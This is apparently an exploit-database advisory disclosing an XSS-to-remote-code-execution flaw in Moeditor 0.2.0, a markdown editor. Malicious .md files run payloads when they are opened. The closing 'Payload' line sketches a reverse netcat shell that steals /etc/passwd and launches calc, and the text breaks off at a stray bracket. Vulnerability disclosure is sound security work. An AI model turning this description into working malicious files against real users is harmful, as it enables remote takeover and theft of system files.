# Exploit Title: Moeditor 0.2.0 XSS to RCE # Exploit Author: TaurusOmar # Twitter:@TaurusOmar # HomePage:taurusomar.com # Date: May 4th, 2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://moeditor.js.org/ # Version: 0.2.0 # Tested on: Windows, Linux, MacOs # Software Description: Software to view and edit sales documentation Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/UdP4JaX # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [